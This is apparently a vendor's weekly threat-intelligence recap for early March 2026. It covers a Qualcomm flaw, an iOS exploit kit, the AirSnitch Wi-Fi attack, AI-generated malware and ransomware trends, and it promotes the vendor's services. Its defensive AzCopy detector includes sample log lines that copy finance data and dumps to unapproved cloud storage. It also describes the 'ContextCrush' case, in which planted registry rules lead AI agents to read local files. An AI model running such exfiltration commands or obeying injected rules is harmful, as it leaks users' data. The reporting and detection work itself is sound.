Weekly Recap: Qualcomm 0-Day, iOS Exploit Chains, AirSnitch Attack & Vibe-Coded Malware – CVE-2026-21385 (CVSS 7.8)
Key Takeaways:
- Discovery and targeted exploitation of CVE-2026-21385, a high-severity buffer over-read in Qualcomm graphics drivers.
- Identification of the Coruna iOS exploit kit lifecycle, highlighting a thriving secondary market for zero-day exploits between state actors and cybercriminals.
- The AirSnitch attack methodology proves that standard Wi-Fi client isolation is architecturally insufficient to prevent AitM attacks.
- Threat actors like Transparent Tribe are industrializing malware production through AI-assisted “vibe-coding” in niche programming languages.
- Critical infrastructure risks identified in Kubernetes RBAC and popular WordPress plugins allow for unauthorized cluster and site administrative access.
Table of Contents
- Qualcomm Graphics Component Vulnerability: CVE-2026-21385
- The Coruna iOS Exploit Kit and the Secondary Market
- AirSnitch: Bypassing Wi-Fi Client Isolation
- Vibe-Coded Malware and AI Industrialization
- Real-Time Ransomware Intelligence and 2025 Trends
- Anthropic and Firefox: AI-Driven Vulnerability Discovery
- Critical Vulnerabilities in Infrastructure and Plugins
- MuddyWater Operations Analysis
- Practical Takeaways for Technical and Business Leaders
- PurpleOps Expertise and Services
- Frequently Asked Questions
Technical analysis of recent threat intelligence indicates a surge in highly targeted mobile exploits, the industrialization of AI-assisted malware development, and significant bypasses in standard Wi-Fi isolation protocols. This weekly recap details the critical vulnerabilities and actor behaviors identified in early March 2026. Data confirms that enterprise technologies now account for nearly 50% of zero-day exploitations, emphasizing the need for a comprehensive cyber threat intelligence platform to track rapid shifts in the threat landscape.
The reporting period has been characterized by the disclosure of a high-severity flaw in Qualcomm hardware, a sophisticated “secondhand” market for iOS exploit kits, and the evolution of Pakistani-aligned threat actors using AI-generated code. Additionally, new research into Wi-Fi client isolation has revealed architectural weaknesses that allow for adversary-in-the-middle (AitM) attacks even in protected environments.
Qualcomm Graphics Component Vulnerability: CVE-2026-21385 (CVSS 7.8)
A critical security flaw in Qualcomm chips, used extensively across the Android ecosystem, is currently undergoing limited, targeted exploitation. Identified as CVE-2026-21385, this vulnerability resides in the Graphics component and is classified as a buffer over-read.

The technical impact of a buffer over-read in a high-privilege component like the graphics driver includes memory corruption and potential arbitrary code execution. While Google’s Android security bulletin confirms evidence of exploitation, specific technical details regarding the exploit strings or the identities of the targeted groups remain restricted. This vulnerability illustrates the continued focus of threat actors on hardware-level entry points to bypass operating system security controls.
The Coruna iOS Exploit Kit and the Secondary Market for Zero-Days
Google’s Threat Analysis Group recently disclosed the lifecycle of the “Coruna” (also known as CryptoWaters) exploit kit. This kit is notable not just for its technical depth (23 exploits and five full iOS exploit chains) but for its transition between disparate threat actors.
Coruna targets iOS versions 13.0 through 17.2.1. Its history suggests a complex supply chain:
- February 2025: Developed or initially deployed by a commercial surveillance vendor (CSV).
- July 2025: Utilized by a suspected Russian espionage group targeting Ukrainian entities.
- Late 2025: Repurposed by financially motivated Chinese cybercrime groups targeting cryptocurrency wallets.
“The movement of this kit between state-sponsored actors and cybercriminals suggests a secondhand market where exploits are resold or leaked after their primary mission is completed.”
This emphasizes the necessity for underground forum intelligence to track the migration of high-tier exploit code into the broader criminal ecosystem.
AirSnitch: Bypassing Wi-Fi Client Isolation
Research led by Xin’an Zhou has introduced “AirSnitch,” an attack that invalidates the encryption and isolation layers used to separate clients on the same Wi-Fi network. Client isolation is a standard security feature in public and corporate guest networks intended to prevent peer-to-peer attacks.
AirSnitch leverages three primary architectural weaknesses:
- Group Key Abuse: Exploiting the shared group keys distributed to all clients for broadcast traffic.
- IP Layer Forwarding: Tricking the gateway into forwarding packets at the IP layer, bypassing isolation that is only enforced at the MAC or Ethernet layers.
- Bridge Manipulation: Manipulating internal switches to forward victim uplink and downlink traffic directly to the adversary.
This research demonstrates that client isolation is insufficient to prevent AitM capabilities for an attacker already connected to the network.
Vibe-Coded Malware and AI Industrialization
The Pakistan-aligned threat actor Transparent Tribe (APT36) has shifted its development strategy toward AI-assisted malware industrialization. Bitdefender reports the use of “vibe-coding” to generate disposable malware in niche programming languages including Nim, Zig, and Crystal.
By using these languages, the actor creates “polyglot” binaries that frequently evade traditional signature-based breach detection systems. The focus is no longer on high technical sophistication but on flooding environments with unique, AI-generated variants that target Indian government entities and foreign embassies. This represents a move toward high-volume, automated malware production.
Real-Time Ransomware Intelligence and 2025 Trends
Analysis of ransomware activity through 2025 shows a divergence between attack volume and total revenue. While the number of attacks increased by 50%, total on-chain payments stagnated at approximately $820 million. However, the median ransom payment increased by 368%, reaching nearly $60,000.
Key shifts in ransomware tactics include:
- AzCopy for Exfiltration: Actors are increasingly using Microsoft’s AzCopy utility rather than Rclone. Using a legitimate Azure tool allows attackers to blend in with authorized cloud traffic.
- Phobos Infrastructure: The guilty plea of Evgenii Ptitsyn confirms the scale of the Phobos ransomware-as-a-service (RaaS) model, which extorted over $39 million from 1,000 victims.
- Payment Rates: The rate of victims paying ransoms dropped from 63% in 2024 to 29% in 2025, suggesting improved recovery capabilities and a shift toward data-theft-only extortion.
For organizations managing large data volumes, utilizing a live ransomware API can provide the telemetry needed to identify these exfiltration patterns in real-time.
Anthropic and Firefox: AI-Driven Vulnerability Discovery
In a partnership with Mozilla, Anthropic utilized the Claude Opus 4.6 model to identify 22 security vulnerabilities in Firefox. The audit identified 14 high-severity, seven moderate, and one low-severity flaw. These issues were patched in Firefox 148.
The findings indicate that LLMs are currently more efficient at identifying vulnerabilities than at constructing functional exploits. The cost-effectiveness of AI-driven auditing suggests that both defenders and attackers will increasingly use similar models to scan large codebases for memory safety issues and logic flaws.
Critical Vulnerabilities in Infrastructure and Plugins
Kubernetes RBAC Bypass: A bug in the Kubernetes API server’s handling of WebSocket connections allows for an authorization bypass. Service accounts with nodes/proxy GET permissions can execute commands in any Pod in the cluster, potentially leading to full cluster compromise.
WPEverest User Registration (CVE-2026-1492): A flaw in this WordPress plugin (CVSS 9.8) allows unauthenticated attackers to create administrator accounts by failing to enforce a server-side allowlist for user-supplied roles.
Context7 “ContextCrush” Attack: Noma Security identified a vulnerability where attackers can plant malicious “Custom Rules” in the Context7 registry. AI agents trust this channel and may execute attacker instructions, such as reading local files, directly on a developer’s machine.
MuddyWater Operations Analysis
Analysis of a VPS linked to the Iranian group MuddyWater (Mercury) reveals an extensive reconnaissance infrastructure. The actor utilizes tools like Shodan, Nuclei, and subfinder to identify targets. Their custom command-and-control framework, KeyC2, uses a custom binary protocol on port 1269. Other identified tools include PersianC2 and ArenaC2. The group shows a clear preference for exploiting networking appliances from BeyondTrust, Ivanti, and Fortinet.
Practical Takeaways for Technical and Business Leaders
Technical Action Items:
- Audit Kubernetes RBAC: Review service accounts for nodes/proxy GET permissions and restrict them immediately.
- Update Mobile Assets: Ensure all Android/Qualcomm devices are updated to mitigate CVE-2026-21385.
- Review Wi-Fi Architecture: Implement 802.1X with per-user VLANs rather than relying on client isolation for layer-2 separation.
- Update WordPress Plugins: Immediately update WPEverest User Registration to version 5.1.3 or later.
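An added example (not code from the original post) of the RBAC audit called for above and in the Kubernetes item under Critical Vulnerabilities: it walks ClusterRole and ClusterRoleBinding objects and lists every service account that ends up with GET on nodes/proxy, wildcards included. The role and binding data is constructed inline in the shape of kubectl's JSON output; the role names, namespaces and service account names are assumptions.

```python
import json

# Constructed sample shaped like the "items" of `kubectl get clusterroles -o json` and
# `kubectl get clusterrolebindings -o json`; in practice load the real output instead.
SAMPLE = json.loads(r'''{
 "roles": [
  {"metadata": {"name": "node-proxy-reader"},
   "rules": [{"apiGroups": [""], "resources": ["nodes/proxy"], "verbs": ["get"]}]},
  {"metadata": {"name": "pod-viewer"},
   "rules": [{"apiGroups": [""], "resources": ["pods", "pods/log"], "verbs": ["get", "list"]}]},
  {"metadata": {"name": "wide-open"},
   "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]}
 ],
 "bindings": [
  {"roleRef": {"kind": "ClusterRole", "name": "node-proxy-reader"},
   "subjects": [{"kind": "ServiceAccount", "name": "metrics-agent", "namespace": "monitoring"}]},
  {"roleRef": {"kind": "ClusterRole", "name": "pod-viewer"},
   "subjects": [{"kind": "ServiceAccount", "name": "app", "namespace": "default"}]},
  {"roleRef": {"kind": "ClusterRole", "name": "wide-open"},
   "subjects": [{"kind": "User", "name": "alice"}, {"kind": "ServiceAccount", "name": "ops", "namespace": "kube-system"}]}
 ]}''')

def rule_grants_nodes_proxy_get(rule):
    """True if one RBAC rule allows GET on nodes/proxy, counting the wildcards RBAC honours."""
    groups, resources, verbs = (rule.get(k, []) for k in ("apiGroups", "resources", "verbs"))
    in_core_group = "" in groups or "*" in groups          # nodes live in the core ("") API group
    on_nodes_proxy = any(r in ("nodes/proxy", "nodes/*", "*") for r in resources)  # "nodes" alone is not enough
    can_get = "get" in verbs or "*" in verbs
    return in_core_group and on_nodes_proxy and can_get

def risky_roles(roles):
    return {r["metadata"]["name"] for r in roles
            if any(rule_grants_nodes_proxy_get(x) for x in r.get("rules", []))}

def service_accounts_with_nodes_proxy_get(roles, bindings):
    """Sorted (namespace/name, role) pairs for service accounts bound cluster-wide to a risky role."""
    risky = risky_roles(roles)
    hits = set()
    for b in bindings:
        # nodes is cluster-scoped, so only ClusterRoleBindings can hand out nodes/proxy
        if b["roleRef"]["kind"] != "ClusterRole" or b["roleRef"]["name"] not in risky:
            continue
        for s in b.get("subjects", []):
            if s.get("kind") == "ServiceAccount":
                hits.add((f"{s['namespace']}/{s['name']}", b["roleRef"]["name"]))
    return sorted(hits)

if __name__ == "__main__":
    for sa, role in service_accounts_with_nodes_proxy_get(SAMPLE["roles"], SAMPLE["bindings"]):
        print(f"REVIEW: {sa} gets GET nodes/proxy via ClusterRole {role}")
```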
Business Strategy:
- Monitor AI Integration: Audit “Shadow AI” instances where developers might connect AI assistants to untrusted registries.
- Enhance Exfiltration Monitoring: Implement baseline behavioral monitoring for Azure storage accounts to detect stealthy use of tools like AzCopy.
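An added example (not from the original post) of the baseline monitoring described here and in the AzCopy item of the ransomware section: it parses constructed process-creation telemetry and flags AzCopy-style uploads whose destination storage account, binary name or install path departs from an assumed baseline. The log format, the approved storage account, the approved install directory and the host and user names are all constructed.

```python
import re
from pathlib import PureWindowsPath
APPROVED_ACCOUNTS = {"corpbackup01"}    # constructed allowlist: storage accounts IT expects uploads to
APPROVED_IMAGE_DIRS = {r"c:\tools"}     # constructed: the only directory IT deploys azcopy.exe into

# Constructed process-creation telemetry (not a real product's log format). The last line
# shows AzCopy command syntax coming from a renamed binary.
SAMPLE_LOGS = r"""
2026-03-03T09:14:02Z host=fs01 user=CORP\svc-backup image=C:\Tools\azcopy.exe cmdline="azcopy copy D:\Backups https://corpbackup01.blob.core.windows.net/nightly?sv=2022-11-02&sig=REDACTED --recursive"
2026-03-03T22:41:17Z host=fs01 user=CORP\jdoe image=C:\Users\jdoe\Downloads\azcopy.exe cmdline="azcopy copy D:\Finance https://x7q2kd.blob.core.windows.net/out?sv=2022-11-02&sig=REDACTED --recursive"
2026-03-03T22:45:09Z host=fs01 user=CORP\jdoe image=C:\Windows\System32\notepad.exe cmdline="notepad.exe notes.txt"
2026-03-04T01:02:33Z host=db02 user=SYSTEM image=C:\Temp\a.exe cmdline="a.exe copy C:\Dumps https://x7q2kd.blob.core.windows.net/out?sig=REDACTED --recursive"
""".strip().splitlines()

LINE_RE = re.compile(r'^(\S+) host=(\S+) user=(\S+) image=(\S+) cmdline="(.*)"$')
# AzCopy upload syntax: copy <local source> https://<account>.(blob|file|dfs).core.windows.net/...
UPLOAD_RE = re.compile(r"\bcopy\s+(?P<src>\S+)\s+https://(?P<account>[a-z0-9]{3,24})"
                       r"\.(?:blob|file|dfs)\.core\.windows\.net/", re.I)

def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, host, user, image, cmdline = m.groups()
    return {"ts": ts, "host": host, "user": user, "image": image, "cmdline": cmdline}

def assess(event):
    """Return a finding for an AzCopy-style upload that breaks the baseline, else None."""
    m = UPLOAD_RE.search(event["cmdline"])
    if not m or m.group("src").lower().startswith("https://"):
        return None  # not a local-to-cloud upload (service-to-service copies are out of scope here)
    reasons = []
    account = m.group("account").lower()
    if account not in APPROVED_ACCOUNTS:
        reasons.append(f"destination storage account '{account}' is not on the approved list")
    img = PureWindowsPath(event["image"])
    if img.name.lower() != "azcopy.exe":
        reasons.append(f"AzCopy syntax from unexpected binary '{img.name}'")
    elif str(img.parent).lower() not in APPROVED_IMAGE_DIRS:
        reasons.append(f"azcopy.exe running from unapproved path '{img.parent}'")
    return {**event, "account": account, "reasons": reasons} if reasons else None

def scan(lines):
    events = (parse_line(line) for line in lines)
    return [f for f in (assess(e) for e in events if e) if f]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"{f['ts']} {f['host']} {f['user']} -> {f['account']}: " + "; ".join(f["reasons"]))
```

The approved backup job on the first line produces no finding, which is the point: the baseline, not the tool name, separates routine AzCopy use from suspicious use.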
PurpleOps Expertise and Services
The complexities of the Coruna exploit kit and the industrialization of vibe-coded malware highlight the necessity of professional security testing and intelligence. PurpleOps provides specialized services to address these high-level threats.
Our Cyber Threat Intelligence service integrates dark web monitoring and Telegram threat monitoring to identify when proprietary exploits are being traded. By leveraging underground forum intelligence, we provide early warnings of exploit migration.
To address risks from hardware flaws and specialized malware, PurpleOps offers Penetration Testing and Red Team Operations. These services simulate tactics used by actors like MuddyWater and Transparent Tribe.
Organizations can utilize our Supply Chain Information Security and Supply Chain Risk Monitoring services to identify vulnerabilities in third-party components before they are exploited.
For real-time ransomware protection, our Protect Ransomware solutions use **real-time ransomware intelligence** to detect and block data exfiltration attempts.
Contact PurpleOps today to strengthen your security posture:
- Explore our Services
- Discover our Security Platform
- Learn more about Dark Web Monitoring
Frequently Asked Questions
What is CVE-2026-21385 and why is it dangerous?
It is a high-severity buffer over-read in Qualcomm’s graphics component. It is dangerous because it allows for potential arbitrary code execution at a hardware level, bypassing many standard Android security controls.
How does the AirSnitch attack bypass Wi-Fi security?
AirSnitch exploits architectural flaws in how Wi-Fi gateways handle group keys and IP layer forwarding, allowing an attacker to intercept traffic from other clients even when “client isolation” is enabled.
What is “vibe-coding” in the context of malware?
Vibe-coding refers to the use of AI to rapidly generate disposable malware variants in niche programming languages. This allows threat actors to flood targets with unique binaries that are difficult for signature-based detection systems to identify.
Why are ransomware payment rates dropping if attack volumes are up?
Improved organizational recovery capabilities and a strategic shift by many companies to refuse payment for data-theft-only extortion have contributed to the decline in payment rates.